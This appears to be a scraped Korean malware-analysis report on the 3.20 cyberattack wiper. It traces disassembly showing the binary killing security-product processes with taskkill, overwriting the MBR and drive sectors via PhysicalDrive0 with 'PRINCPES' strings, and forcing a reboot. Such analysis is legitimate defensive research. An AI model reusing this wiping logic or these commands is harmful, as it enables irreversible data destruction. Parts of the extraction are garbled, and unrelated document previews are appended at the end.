3.20 테러 악성코드바이너리분석 손충호 (StolenByte) WOWHACKER Group 해당문서는 WOWHACKER Group 의문서이므로, 무단도용및수 정및변조는할수없습니다. 페이지 1 / 20

Size: px
Start display at page:

Download "3.20 테러 악성코드바이너리분석 손충호 (StolenByte) WOWHACKER Group 해당문서는 WOWHACKER Group 의문서이므로, 무단도용및수 정및변조는할수없습니다. 페이지 1 / 20"

Transcription

1 3.20 테러 악성코드바이너리분석 손충호 (StolenByte) WOWHACKER Group 해당문서는 WOWHACKER Group 의문서이므로, 무단도용및수 정및변조는할수없습니다. 페이지 1 / 20

2 전체적인공격프로세스 페이지 2 / 20

3 1. 바이너리가사용할 LoadLibrary 하여함수 Load Ntdll.dll Kernel32.dll advapi32.dll Secur32.dll Shlwapi.dll GDI32.dll RPCRT4.dll USER32.dll Msvcrt.dll IMM32.dll USP10.dll LPK.dll [ 그림 1] Load 된 Library 해당 API 주소를얻어오는과정이백신의탐지를벗어나기위해사용되는것으로추정된다. 2. OpenFileMappingA 시도 CA. 57 PUSH EDI ; ApcRunCm CB. 8DBE F LEA EDI,DWORD PTR DS:[ESI+4F8] D1. 57 PUSH EDI ; ApcRunCm D2. 33DB XOR EBX,EBX D4. 53 PUSH EBX D5. 6A 04 PUSH D7. FF CALL DWORD PTR DS:[ESI+334] ;kernel32.openfilemappinga 0012FE FE FE5C ApcRunCm 페이지 3 / 20

4 [ OpenFileMappingA Parameter ] 해당위치에서 OpenFileMappingA 하는행위는다음과같다. OpenFileMappingA(FILE_MAP_READ, 0, JO CRAS PCI8273V ); 해당공격을당한이후에는해당바이너리가다시는실행되는일이없는데, OpenFileMappingA 로 Open 이된다면공격이되지않는시스템으로간주하여, 바로종료하게된다. 3. OpenFileMappingA 시도실패했을경우, CreateFileMappingA [ 그림 2] OpenFileMappingA Return Value [ 그림 3] EAX == Return Value 현시스템에서는처음실행상태이기때문에, Open 에실패할수밖에없는상황이다. 바이너리에서는 Open 을실패하게되면 CreateFileMappingA 로생성을시도한다 E5. 57 PUSH EDI E6. 6A 10 PUSH E8. 53 PUSH EBX E9. 6A 04 PUSH EB. 53 PUSH EBX EC. 6A FF PUSH EE. FF CALL DWORD PTR DS:[ESI+338] ; kernel32.createfilemappinga 0012FE48 FFFFFFFF 0012FE4C FE 페이지 4 / 20

5 0012FE FE FE5C ApcRunCm [ CreateFileMappingA Parameter ] 해당위치에서 CreateFileMappingA하는행위는다음과같다. CreateFileMappingA(-1, NULL, PAGE_READWRITE, 0, 10, JO CRAS PCI8273V ); 4. GetWindowsDirectoryA 를통해시스템폴더경로가져오기 F PUSH F9. 8D85 F4FEFFFF LEA EAX,[LOCAL.67] FF. 50 PUSH EAX FF96 3C CALL DWORD PTR DS:[ESI+33C] ; kernel32.getwindowsdirectorya 0012FE FE6C 0012FE5C [ GetWindowsDirectoryA Parameter ] 0012FE6C 43 3A 5C E 44 4F C:\WINDOWS [ GetWindowsDirectory 결과값 ] 5. strcat 을통해파일경로완성 D86 2E LEA EAX,DWORD PTR DS:[ESI+52E] C. 50 PUSH EAX D. 8D85 F4FEFFFF LEA EAX,[LOCAL.67] PUSH EAX FF96 A CALL DWORD PTR DS:[ESI+3A8] ; msvcrt.strcat 0012FE FE5C 0012FE6C ASCII "C:\\WINDOWS" C7 ASCII "\\Temp\\~v3.log" [ strcat Parameter ] 페이지 5 / 20

6 0012FE6C 43 3A 5C E 44 4F C D 70 5C C:\WINDOWS\Temp\ 0012FE7C 7E E 6C 6F 67 ~v3.log [ 완성된경로 ] 6. PathFileExistsA 를통해 strcat 으로완성한경로, 존재여부확인 C. 8D85 F4FEFFFF LEA EAX,[LOCAL.67] PUSH EAX FF96 CC CALL DWORD PTR DS:[ESI+3CC] ; shlwapi.pathfileexistsa 0012FE5C 0012FE6C ASCII "C:\\WINDOWS\\Temp\\~v3.log" [ PathFileExistsA Parameter ] [ 그림 4] PathFileExistsA Return Value [ 그림 5] EAX == Return Value == FALSE 현재시스템은바이너리를처음실행시킨상태라파일이존재하지않는다. 7. 파일이존재하지않을경우, 명령실행 BA. 8D86 B LEA EAX,DWORD PTR DS:[ESI+5B3] Address=00402A4C, (ASCII "taskkill /F /IM pasvc.exe") [ Execute Command ] B8. 6A 00 PUSH BA. 8D86 B LEA EAX,DWORD PTR DS:[ESI+5B3] C0. 8DBE LEA EDI,DWORD PTR DS:[ESI+394] C6. 50 PUSH EAX ; ApcRunCm.00402A4C 페이지 6 / 20

7 004021C7. FF17 CALL DWORD PTR DS:[EDI] ; kernel32.winexec 0012FE A4C ASCII "taskkill /F /IM pasvc.exe" 0012FE4C [ WinExec1 Parameter ] 해당위치에서 WinExec하는행위는다음과같다. WinExec("taskkill /F /IM pasvc.exe, SW_HIDE); C9. 6A 00 PUSH CB. 81C6 CD ADD ESI,5CD D1. 56 PUSH ESI ; ApcRunCm.00402A D2. FF17 CALL DWORD PTR DS:[EDI] ; kernel32.winexec 0012FE A66 ASCII "taskkill /F /IM clisvc.exe" 0012FE4C [ WinExec2 Parameter ] 해당위치에서 WinExec하는행위는다음과같다. WinExec ("taskkill /F /IM clisvc.exe", SW_HIDE); 8. 파일이존재하지않을경우, CreateThread 로 Thread 생성 C. 8D45 08 LEA EAX,[ARG.1] F. 50 PUSH EAX PUSH EBX PUSH ESI ; ApcRunCm JE SHORT ApcRunCm C FFB PUSH DWORD PTR DS:[ESI+260] ; ApcRunCm E A. EB 06 JMP SHORT ApcRunCm C > FFB PUSH DWORD PTR DS:[ESI+280] ; ApcRunCm.00401AB > 53 PUSH EBX PUSH EBX FF CALL DWORD PTR DS:[ESI+344] ; kernel32.createthread 페이지 7 / 20

8 0012FE FE4C FE AB9 ApcRunCm.00401AB9 0012FE ApcRunCm FE FE5C 0012FF80 [ CreateThread Parameter ] 해당위치에서 CreateThread가하는행위는다음과같다. CreateThread(NULL, 0, 0x401AB9( 함수주소 ), 0x402499(Parameter 주소 ), 0, 0x12FF80(0)); E. 6A FF PUSH PUSH EAX FF CALL DWORD PTR DS:[ESI+348] ; kernel32.waitforsingleobject Thread가끝날때까지, 대기 9. [Thread 1] PhysicalDrive CreateFile 로 Open E. 6A FF PUSH PUSH EAX FF CALL DWORD PTR DS:[ESI+348] ; kernel32.waitforsingleobject 009EFCE0 009EFD08 ASCII "\\\\.\\PhysicalDrive0" 009EFCE4 C EFCE EFCEC EFCF EFCF EFCF [ CreateFile Parameter ] 해당위치에서 CreateFile가하는행위는다음과같다. CreateFile( \\\\.\\PhysicalDrive0, GENERIC_READ GENERIC_WRITE (0xC ), FILE_SHARE_READ FILE_SHARE_WRITE (3), NULL, OPEN_EXISTING, 0, NULL); PhysicalDrive0 을 Open 을하게되면 MBR 로직접접근이가능하다. 페이지 8 / 20

9 10. [Thread 1] SetFilePointer 이용하여, PhysicalDrive0 위치설정후 ReadFile로복사 00401ED2. 6A 00 PUSH ED C MOV [ARG.2],EAX 00401ED7. 8D45 0C LEA EAX,[ARG.2] 00401EDA. 50 PUSH EAX 00401EDB. C1E6 09 SHL ESI, EDE. 56 PUSH ESI 00401EDF. FF77 40 PUSH DWORD PTR DS:[EDI+40] 00401EE2. FF CALL DWORD PTR DS:[EDI+380] ; kernel32.setfilepointer 009EFAB EFAB EFABC 009EFADC 009EFAC [ SetFilePointer Parameter ] 해당위치에서 SetFilePointer 가하는행위는다음과같다. SetFilePointer(CreateFile Handle( \\\\.\\PhysicalDrive0 ), 0, NULL, FILE_BEGIN); 00401EF0 > \6A 00 PUSH EF2. 8D45 FC LEA EAX,[LOCAL.1] 00401EF5. 50 PUSH EAX 00401EF PUSH EFB. FF75 10 PUSH [ARG.3] 00401EFE. FF77 40 PUSH DWORD PTR DS:[EDI+40] 00401F01. FF CALL DWORD PTR DS:[EDI+390] ; kernel32.readfile 009EFAB EFAB4 009EFAF0 009EFAB EFABC 009EFACC 009EFAC [ ReadFile Parameter ] 해당위치에서 ReadFile 가하는행위는다음과같다. 페이지 9 / 20

10 ReadFile(CreateFile Handle( \\\\.\\PhysicalDrive0 ), 0x009EFAF0, 0x200, &NumberOfBytesRead, NULL); ReadFile 을하는이유는 MBR 를백업을하는의미라고생각한다. 11. Loop 를통해 PRINCPES * 60 번복사 ( 총 480 Byte 복사 ) E > /8D45 F4 /LEA EAX,[LOCAL.3] PUSH EAX FF96 B CALL DWORD PTR DS:[ESI+3B8] ; msvcrt.strlen ; strlen으로 PRINCPES의길이를구하여 memcpy의 Parameter로사용 PUSH EAX D45 F4 LEA EAX,[LOCAL.3] C. 50 PUSH EAX D. 8D843D F4FDFFFF LEA EAX,DWORD PTR SS:[EBP+EDI-> PUSH EAX FF96 B CALL DWORD PTR DS:[ESI+3B4] ; msvcrt.memcpy 009EFAB0 009EFACC 009EFAB4 009EFCCC ASCII "PRINCPES" 009EFAB [ memcpy Parameter ] 해당위치에서 memcpy가하는행위는다음과같다. memcpy(0x9efacc, PRINCPES, 8); 12. [Thread 1] WriteFile 로 Segment, MBR 를 10 번반복덮는다 AC. 6A 00 PUSH AE C MOV [ARG.2],EAX B1. 8D45 0C LEA EAX,[ARG.2] B4. 50 PUSH EAX B5. C1E6 09 SHL ESI, B8. 56 PUSH ESI B9. FF77 40 PUSH DWORD PTR DS:[EDI+40] BC. FF CALL DWORD PTR DS:[EDI+380] ; kernel32.setfilepointer 페이지 10 / 20

11 009EFA EFA EFA98 009EFAB8 009EFA9C [ SetFilePointer Parameter ] 해당위치에서 SetFilePointer 가하는행위는다음과같다. SetFilePointer(CreateFile Handle( \\\\.\\PhysicalDrive0 ), 0x7000, NULL, FILE_BEGIN); 0x7000 는세그먼트 Buffer 주소 CA > \6A 00 PUSH CC. 8D45 FC LEA EAX,[LOCAL.1] CF. 50 PUSH EAX D PUSH D5. FF75 10 PUSH [ARG.3] D8. FF77 40 PUSH DWORD PTR DS:[EDI+40] DB. FF CALL DWORD PTR DS:[EDI+374] ; kernel32.writefile 009EFA8C EFA90 009EFACC ASCII "PRINCPESPRINCPESPRINCPESPRINCPESPRINCPESPRINCPESPRINCPESPRINCPESPRINCPESPRIN> 009EFA EFA98 009EFAA8 009EFA9C [ WriteFile Parameter ] 해당위치에서 WriteFile가하는행위는다음과같다. WriteFile(CreateFile Handle( \\\\.\\PhysicalDrive0 ), 480Byte만큼생성한 Buffer 위치, 0x200(512), &NumberOfBytesWritten, NULL); 생성은 480Byte 만큼했는데, 512Byte 만큼덮는이유는모르겠다. 이러한비슷한과정을한번더하는데, 이번엔 Segment Buffer 주소를덮는게아닌, MBR을직접덮는다. 페이지 11 / 20

12 004020AC. 6A 00 PUSH AE C MOV [ARG.2],EAX B1. 8D45 0C LEA EAX,[ARG.2] B4. 50 PUSH EAX B5. C1E6 09 SHL ESI, B8. 56 PUSH ESI B9. FF77 40 PUSH DWORD PTR DS:[EDI+40] BC. FF CALL DWORD PTR DS:[EDI+380] ; kernel32.setfilepointer 009EFA EFA EFA98 009EFAB8 009EFA9C [ SetFilePointer Parameter ] 해당위치에서 SetFilePointer 가하는행위는다음과같다. SetFilePointer(CreateFile Handle( \\\\.\\PhysicalDrive0 ), 0, NULL, FILE_BEGIN); PhysicalDrive0 의 0 번째주소는 MBR 이존재한다. Write 는위와동일하게진행한다 DFC. 837D FC 0A CMP [LOCAL.1],0A 00401E00.^ 7C 8A \JL SHORT ApcRunCm.00401D8C 이해당과정을 10번진행한다. 13. [Thread 1] B:\\ 부터 Drive Type 가져오기 00401DFC. 837D FC 0A CMP [LOCAL.1],0A 00401E00.^ 7C 8A \JL SHORT ApcRunCm.00401D8C 009EFE04 009EFE08 009EFFAC D5 ASCII "B:\\" [ strcpy Parameter ] 00401B2B. 50 PUSH EAX 00401B2C. FF CALL DWORD PTR DS:[ESI+358] ; kernel32.getdrivetypea 페이지 12 / 20

13 009EFE18 009EFFAC 009EFFAC 42 3A 5C 00 [ GetDriveTypeA Parameter ] B:\. [ 그림 6] GetDriverType Parameter [ 그림 7] GetDriveType Return Value 00401B32. 83F8 03 CMP EAX, B JE SHORT ApcRunCm.00401B3C 00401B37. 83F8 02 CMP EAX, B3A. 75 2C JNZ SHORT ApcRunCm.00401B68 GetDriveType Return에의한분기 HDD 또는 Flash 메모리가아니면 C,D,E,F를전부탐지한다. 페이지 13 / 20

14 char drive[] = B:\\ ; drive[0]++ == C,D,E,F~~ 14. [Thread 1] 분기가맞으면, CreateThread 로 Thread 생성 00401B PUSH EAX 00401B PUSH EBX 00401B PUSH ESI ; ApcRunCm B48. FFB PUSH DWORD PTR DS:[ESI+284] ; ApcRunCm.00401B B4E. 895D F0 MOV DWORD PTR SS:[EBP-10],EBX 00401B PUSH EBX 00401B PUSH EBX 00401B53. FF CALL DWORD PTR DS:[ESI+344] ; kernel32.createthread 009EFE EFE EFE0C 00401B93 ApcRunCm.00401B93 009EFE ApcRunCm EFE EFE18 009EFFA4 [ CreateThread Parameter ] 해당위치에서 CreateThread가하는행위는다음과같다. CreateThread(NULL, 0, 0x401B93( 함수주소 ), 0x402499(Parameter 주소 ), 0, 0x9EFFA4(0)); 15. [Thread 2] HDD, Flash 메모리에대한 GetDiskFreeSpaceA 00401BDB. 8D45 E8 LEA EAX,[LOCAL.6] 00401BDE. 50 PUSH EAX 00401BDF. 8D45 E4 LEA EAX,[LOCAL.7] 00401BE2. 50 PUSH EAX 00401BE3. 8D45 08 LEA EAX,[ARG.1] 00401BE6. 50 PUSH EAX 00401BE7. 8D45 E0 LEA EAX,[LOCAL.8] 00401BEA. 50 PUSH EAX 00401BEB. 8D45 A0 LEA EAX,[LOCAL.24] 페이지 14 / 20

15 00401BEE. 50 PUSH EAX 00401BEF. FF CALL DWORD PTR DS:[ESI+388] ; kernel32.getdiskfreespacea 00AEFF34 00AEFF38 00AEFF3C 00AEFF40 00AEFF44 00AEFF54 00AEFF94 00AEFFBC 00AEFF98 00AEFF9C [ GetDiskFreeSpaceA Parameter ] 해당위치에서 GetDiskFreeSpaceA 가하는행위는다음과같다. GetDiskFreeSpaceA( C:\\, &dwsectperclust, &dwbytespersect, &dwfreeclusters, &dwtotalclusters); 이후 GetDiskFreeSpaceA 를하게되는데, 공격자의실수가있는것같다 C05. 3BC7 CMP EAX,EDI ; EDI = 0x ; EAX = 0x ; GetDiskFreeSpaceA를성공하였기때문에 EAX에 0가아닌다른값이왔는데, ; GetDiskFreeSpaceExA를다시시도한다 C07. 0F84 5B JE ApcRunCm.00401D C0D. 8D45 C C C11. 8D45 BC 00401C C C16. 8D45 A C C1A. 897D C C1D. 897D BC 00401C D C C D C C26. FF96 8C LEA EAX,[LOCAL.15] PUSH EAX LEA EAX,[LOCAL.17] PUSH EAX PUSH EDI LEA EAX,[LOCAL.24] PUSH EAX MOV [LOCAL.16],EDI MOV [LOCAL.17],EDI MOV [LOCAL.14],EDI MOV [LOCAL.15],EDI CALL DWORD PTR DS:[ESI+38C] ; kernel32.getdiskfreespaceexa 00AEFF38 00AEFF54 페이지 15 / 20

16 00AEFF3C AEFF40 00AEFF70 00AEFF44 00AEFF78 00AEFF A 5C C:\ [ GetDiskFreeSpaceExA Parameter ] 해당위치에서 GetDiskFreeSpaceExA 가하는행위는다음과같다. GetDiskFreeSpaceExA("C:\\", 0, &TotalNumberOfBytes, &TotalNumberOfFreeBytes); 16. [Thread 2] HDD, Flash 메모리 CreateFile Open 00401C PUSH EDI 00401C5A PUSH C5F. 6A 03 PUSH C PUSH EDI 00401C62. 6A 03 PUSH C C0 PUSH C C69. 8D45 A0 LEA EAX,[LOCAL.24] 00401C6C. 50 PUSH EAX 00401C6D. FF CALL DWORD PTR DS:[ESI+370] ; kernel32.createfilea 00AEFF2C 00AEFF54 ASCII "\\\\.\\C:" 00AEFF30 C AEFF AEFF AEFF3C AEFF AEFF [ CreateFileA Parameter ] 해당위치에서 CreateFile가하는행위는다음과같다. CreateFile(\\\\.\\C:, GENERIC_READ GENERIC_WRITE (0xC ), FILE_SHARE_READ FILE_SHARE_WRITE (3), NULL, OPEN_EXISTING, FILE_FLAG_NO_BUFFERING FILE_FLAG_RANDOM_ACCESS, NULL); 모든드라이브를다돌때까지 Loop를돌면서 HDD, Flash 메모리같은드라이브같은드라이브가발견되면 Thread를생성한다. 페이지 16 / 20

17 17. [Thread 2] 512 Byte 만큼 String 생성 00401CC2 > /C740 FF >/MOV DWORD PTR DS:[EAX-1],4E CC9. C > MOV DWORD PTR DS:[EAX+3], CD0. C MOV BYTE PTR DS:[EAX+7], CD4. 83C0 0A ADD EAX,0A 00401CD7. 8D1401 LEA EDX,DWORD PTR DS:[ECX+EAX] 00401CDA. 3B55 08 CMP EDX,[ARG.1] 00401CDD.^\72 E3 \JB SHORT ApcRunCm.00401CC2 [ Create String ] [ 그림 8] 생성된 String 18. [Thread 2] SetFilePointer 로 Pointer 지정 00401CC2 > /C740 FF >/MOV DWORD PTR DS:[EAX-1],4E CC9. C > MOV DWORD PTR DS:[EAX+3], CD0. C MOV BYTE PTR DS:[EAX+7], CD4. 83C0 0A ADD EAX,0A 00401CD7. 8D1401 LEA EDX,DWORD PTR DS:[ECX+EAX] 00401CDA. 3B55 08 CMP EDX,[ARG.1] 00401CDD.^\72 E3 \JB SHORT ApcRunCm.00401CC2 00AEFF AEFF3C AEFF40 00AEFF6C 00AEFF [ SetFilePointer Parameter ] 페이지 17 / 20

18 해당위치에서 SetFilePointer 가하는행위는다음과같다. SetFilePointer(CreateFile Handle( \\\\.\\C: ), 0, NULL, FILE_BEGIN); 19. [Thread 2] WriteFile 로생성한 String, 200 번 Write 00401D1D > /57 /PUSH EDI 00401D1E. 8D45 D0 LEA EAX,[LOCAL.12] 00401D PUSH EAX 00401D22. FF75 08 PUSH [ARG.1] 00401D D D0 MOV [LOCAL.12],EDI 00401D28. FF75 F0 PUSH [LOCAL.4] 00401D2B. FF75 EC PUSH [LOCAL.5] 00401D2E. FF CALL DWORD PTR DS:[ESI+374] ; kernel32.writefile 00AEFF AEFF ASCII "PRINCIPES" 00AEFF3C AEFF40 00AEFF84 00AEFF [ WriteFile Parameter ] 해당위치에서 WriteFile가하는행위는다음과같다. WriteFile(CreateFile Handle( \\\\.\\C: ), 512Byte만큼생성한 Buffer 위치, 0x200(512), &NumberOfBytesWritten, NULL); 00401D34. FF4D DC DEC [LOCAL.9] 00401D37.^\75 E4 \JNZ SHORT ApcRunCm.00401D1D Stack SS:[00AEFF90]=000000C8 [ Loop Count ] 20. [Thread 2] Loop 953 번돌면서해당 HDD, Flash 메모리 Write Stack SS:[00AEFFA8]=003EB9ED [ Total Loop Count ] 1 회 Loop 당 4310 (0x10D6) Count 가된다. 페이지 18 / 20

19 0x003EB9ED / 0x10D6 == 953~4 정도가 Loop 를반복하게되면서 512 (0x200) Byte 만큼덮게된 다. 21. [Thread 1] 재부팅으로최종마무리 00401B76 > \68 E PUSH 493E B7B. FF CALL DWORD PTR DS:[ESI+354] ; kernel32.sleep 009EFE E0 [ Sleep Parameter ] 약 300(300000(0x493E0)ms) 초간대기한다 A. 33FF XOR EDI,EDI C. 57 PUSH EDI D. 8D86 8E LEA EAX,DWORD PTR DS:[ESI+58E> PUSH EAX ; ApcRunCm.00402A FF CALL DWORD PTR DS:[ESI+394] ; kernel32.winexec 009EFDF A27 ASCII "shutdown -r -t 0" 009EFDF [ WinExec Parameter ] 컴퓨터종료명령어를실행한다. 그러나, Windows Vista 이후버전에서는권한문제등으로종료 가안될수있다 A PUSH F. FF CALL DWORD PTR DS:[ESI+354] ; kernel32.sleep 009EFDF [ Sleep Parameter ] 약 10 초정도대기후, SYSTEM 권한얻기작업을통해 Windows 종료를시도한다. GetCurrentProcess OpenProcessToken 페이지 19 / 20

20 LookupPrivilegeValueA AdjustTokenPrivileges 해당 API를통해, SYSTEM 권한을획득한다. 권한획득에자세한방법은 Windows 7에서 DLL Injection이필요할때, 동일한방법을이용하기때문에별도로검색을통해찾아보길바란다 B PUSH A0. 6A 05 PUSH A2. FF96 D CALL DWORD PTR DS:[ESI+3D0] ; USER32.ExitWindowsEx 009EFDEC EFDF [ ExitWindowsEx Parameter ] ExitWindowsEx는 Windows를종료하게해주는 API 이지만, SYSTEM 권한이없으면작동에오작동이있을수있다. 해당위치에서 ExitWindowsEx 가하는행위는다음과같다. ExitWindowsEx( EWX_FORCE, SHTDN_REASON_FLAG_PLANNED SHTDN_REASON_MINOR_UPGRADE SHTDN_REASON_MAJOR_OPERATINGSYSTEM ); Windows 가강제로종료된다. 22. 마무리 이와같은과정을전부다통과하면, 자동으로 Windows가재부팅또는종료가된다. 기존 C 드라이브같은경우도 Dummy값으로일부덮어버렸기때문에, MBR을복구한다고할지라도쉽게 C 드라이브같은영역은복구하기힘들것이라예상된다. 페이지 20 / 20

CKKeyPro 적용가이드

CKKeyPro 적용가이드 3.20 사이버테러악성코드분석보고서 라온시큐어보안기술연구팀 작성일 : 2013. 03 페이지 : 1/15 Introduction 2013년 3월 20일오후, MBC, KBS, YTN, 농협, 신한은행, 제주은행전산망장애가동시에발생하였다. 피해기관들의호스트약 500여대에오류메시지가화면에나타났으며악성코드에감염된호스트는사용할수없는상태가되었다. 현재까지정확한침투경로가밝혀지지않고있다.

More information

Deok9_Exploit Technique

Deok9_Exploit Technique Exploit Technique CodeEngn Co-Administrator!!! and Team Sur3x5F Member Nick : Deok9 E-mail : DDeok9@gmail.com HomePage : http://deok9.sur3x5f.org Twitter :@DDeok9 > 1. Shell Code 2. Security

More information

hlogin2

hlogin2 0x02. Stack Corruption off-limit Kernel Stack libc Heap BSS Data Code off-limit Kernel Kernel : OS Stack libc Heap BSS Data Code Stack : libc : Heap : BSS, Data : bss Code : off-limit Kernel Kernel : OS

More information

Microsoft PowerPoint - a10.ppt [호환 모드]

Microsoft PowerPoint - a10.ppt [호환 모드] Structure Chapter 10: Structures t and Macros Structure 관련된변수들의그룹으로이루어진자료구조 template, pattern field structure를구성하는변수 (cf) C언어의 struct 프로그램의 structure 접근 entire structure 또는 individual fields Structure는

More information

제 9 도는 6제어항목의 세팅목표의 보기가 표시된 레이더 챠트(radar chart). 제 10 도는 제 6 도의 함수블럭(1C)에서 사용되는 각종 개성화 함수의 보기를 표시하는 테이블. 제 11a 도 제 11c 도까지는 각종 조건에 따라 제공되는 개성화함수의 변화의

제 9 도는 6제어항목의 세팅목표의 보기가 표시된 레이더 챠트(radar chart). 제 10 도는 제 6 도의 함수블럭(1C)에서 사용되는 각종 개성화 함수의 보기를 표시하는 테이블. 제 11a 도 제 11c 도까지는 각종 조건에 따라 제공되는 개성화함수의 변화의 (19) 대한민국특허청(KR) (12) 특허공보(B1) (51) Int. Cl. 5 B66B 1/18 (45) 공고일자 1993년09월28일 (11) 공고번호 특1993-0009339 (21) 출원번호 특1989-0002580 (65) 공개번호 특1989-0014358 (22) 출원일자 1989년03월02일 (43) 공개일자 1989년10월23일 (30) 우선권주장

More information

Microsoft Word - building the win32 shellcode 01.doc

Microsoft Word - building the win32 shellcode 01.doc Win32 Attack 1. Local Shellcode 작성방법 By 달고나 (Dalgona@wowhacker.org) Email: zinwon@gmail.com Abstract 이글은 MS Windows 환경에서 shellcode 를작성하는방법에대해서설명하고있다. Win32 는 *nix 환경과는사뭇다른 API 호출방식을사용하기때문에조금복잡하게둘러서 shellcode

More information

2004math2(c).PDF

2004math2(c).PDF 3 2004 1,,,, 2 1 1. LCD ( )? () ( ) 2. 100 () () 3. < > (1) (2) (3) ( ) < > < >(1)(3) < > (), (3)< >()? ()... () A. B. C. (3), A, B, A, B, C 4. (), () < >? < >? [2]..,.,,,,,...,,,,, 2 5. < > (1), (2) (3)

More information

02.Create a shellcode that executes "/bin/sh" Excuse the ads! We need some help to keep our site up. List Create a shellcode that executes "/bin/sh" C

02.Create a shellcode that executes /bin/sh Excuse the ads! We need some help to keep our site up. List Create a shellcode that executes /bin/sh C 02.Create a shellcode that executes "/bin/sh" Excuse the ads! We need some help to keep our site up. List Create a shellcode that executes "/bin/sh" C language Assembly code Change permissions(seteuid())

More information

2004math2(a).PDF

2004math2(a).PDF 3 2004 1..,,,..,. 2. 1.. 1.. LCD ( )? () ( ) 2. 100. () () 3... < > (1). (2). (3) ( ) < > < >(1)(3). < > (), (3)< >()? ()... () A.. B.. C.. (3), A, B, A, B, C 4. (), (). < >? < >? [2] ..,.,,,,,

More information

실사구시학파의 실증적 학풍이 일어나므로 서구적인 과학사상의 유입을 본 것 등이 인식 의 대상이 될 것이다. 그러나 이조 봉건사회 최종의 절대적 왕권주의자 대원군에 의하여 그 싹은 잘리고 말았다. 따라서 다단한 전기가 될 근대적 개방에 의하여 재건하려던 서구적 교육 즉

실사구시학파의 실증적 학풍이 일어나므로 서구적인 과학사상의 유입을 본 것 등이 인식 의 대상이 될 것이다. 그러나 이조 봉건사회 최종의 절대적 왕권주의자 대원군에 의하여 그 싹은 잘리고 말았다. 따라서 다단한 전기가 될 근대적 개방에 의하여 재건하려던 서구적 교육 즉 朝 鮮 科 學 史 JB409.11-1 洪 以 燮 (홍이섭) 著 - 東 京 : 三 省 堂 出 版 ( 株 ) 1944년( 昭 和 19) [서론] 一. 과학사의 방법 인류의 행복의 증진은 과학과 자연과의 투쟁에 관련된다. 국가의 국방적 건설과 국토 계획 이야말로 국민생활의 최고의 지표인데 그 기초적 문제는 과학에 있다. 그러므로 현대 인류생 활의 기술적 문제로서의

More information

슬라이드 1

슬라이드 1 파일 I/O 와디렉터리컨트롤 1 목차 기본적인파일처리 파일검색 파일열기 & 닫기 파일읽기 & 쓰기 삭제, 복사, 이동 (?) 파일의시간정보얻기 파일특성정보얻기 파일포인터 directory 생성 & 삭제 경로설정 경로얻기 2 파일생성 / 열기 HANDLE CreateFile ( LPCTSTR lpfilename, DWORD dwdesiredaccess, 파일이름

More information

Microsoft PowerPoint - a6.ppt [호환 모드]

Microsoft PowerPoint - a6.ppt [호환 모드] 이장의내용 6 장조건부처리 부울과비교명령어 조건부점프 조건부루프명령어 조건부구조 컴퓨터정보통신 어셈블리언어 2 6.2 부울과비교명령어 부울명령어 Instructions ti 동작 AND dst, src OR dst, src XOR dst, src NOT dst dst dst AND src dst dst OR src dst dst XOR src dst NOT

More information

INTRO Basic architecture of modern computers Basic and most used assembly instructions on x86 Installing an assembly compiler and RE tools Practice co

INTRO Basic architecture of modern computers Basic and most used assembly instructions on x86 Installing an assembly compiler and RE tools Practice co Basic reverse engineering on x86 This is for those who want to learn about basic reverse engineering on x86 (Feel free to use this, email me if you need a keynote version.) v0.1 SeungJin Beist Lee beist@grayhash.com

More information

Codegate Preliminary Match Repot

Codegate Preliminary Match Repot Codegate Preliminary Match Repot - 2008 Historymaker 소개글 Code gate - 2008 뭐알아서참고.. ㅡㅡ ;;; 목차 1 4 2012.06.15 20:19 ================================================================== / Codegate Preliminary

More information

No Slide Title

No Slide Title Copyright, 2017 Multimedia Lab., UOS 시스템프로그래밍 (Assembly Code and Calling Convention) Seong Jong Choi chois@uos.ac.kr Multimedia Lab. Dept. of Electrical and Computer Eng. University of Seoul Seoul, Korea

More information

Cogame 취약점 보고

Cogame 취약점 보고 Frist Version: 2006. 01. 07 Last Version: 2006. 01. 19 anesra@{null2root.org, gmail.com Table of Contents 1. 기본개념과도구...3 1.1 윈도우쉘코드... 3 1.2 윈도우메모리 LAYOUT... 4 1.3 레지스터... 4 1.4 기본어셈블리어명령어... 4 2. 쉘코드만들기...6

More information

Microsoft PowerPoint - a8a.ppt [호환 모드]

Microsoft PowerPoint - a8a.ppt [호환 모드] 이장의내용 8 장고급프로시저 스택프레임 재귀 (Recursion) Invoke, Addr, Proc, Proto 디렉티브 다중모듈프로그램작성 2 8.2 스택프레임 Stack Frame ( 또는 activation record) procedure 의다음사항을저장한 영역 urn address passed parameter ( 스택매개변수 ) saved register

More information

Malware Analysis

Malware Analysis Malware Analysis 악성코드분석 3.20 전산대란의주역 DarkSeoul.exe 에대하여알아보자. 3/21/2016 By Kali KM 2 Malware Analysis SAMPLE DETAILES Dropper File Name File Size MD5 SHA-1 DarkSeoul.exe 418 KB 9263E40D9823AECF9388B64DE34EAE54

More information

=

= written by vangelis(vangelis@wowhacker.org) 0 0000 8 1000 1 0001 9 1001 2 0010 10 1010 3 0011 11 1011 4 0100 12 1100 5 0101 13 1101 6 0110 14 1110 7 0111 15 1111 110112 + 100012 = 1011002 110 0000 0101

More information

10-2 삼각형의닮음조건 p270 AD BE C ABC DE ABC 중 2 비상 10, 11 단원도형의닮음 (& 활용 ) - 2 -

10-2 삼각형의닮음조건 p270 AD BE C ABC DE ABC 중 2 비상 10, 11 단원도형의닮음 (& 활용 ) - 2 - 10 단원 : 도형의닮음 10-1 닮음도형 p265 ABC DEF ABC DEF EF B ABCD EFGH ABCD EFGH EF A AB GH ADFC CF KL 중 2 비상 10, 11 단원도형의닮음 (& 활용 ) - 1 - 10-2 삼각형의닮음조건 p270 AD BE C ABC DE ABC 중 2 비상 10, 11 단원도형의닮음 (& 활용 ) - 2 -

More information

[ 악성코드상세분석보고서 ] SK 커뮤니케이션즈해킹관련상세분석보고서 nateon.exe 대응 2 팀

[ 악성코드상세분석보고서 ] SK 커뮤니케이션즈해킹관련상세분석보고서 nateon.exe 대응 2 팀 [ 악성코드상세분석보고서 ] SK 커뮤니케이션즈해킹관련상세분석보고서 nateon.exe 대응 2 팀 2011-08-04 SK 커뮤니케이션즈해킹주요내용 : 지난 7 월 26 일 ( 화 ) SK 커뮤니케이션즈가해킹으로인해일부고객의정보가유출된사실이확인되었고, 28 일 ( 목 ) 홈페이지팝업공지문 ( 개인정보유출 ) 과함께관련된언론보도자료가배포되었다. 이는 3500

More information

°ø±â¾Ð±â±â

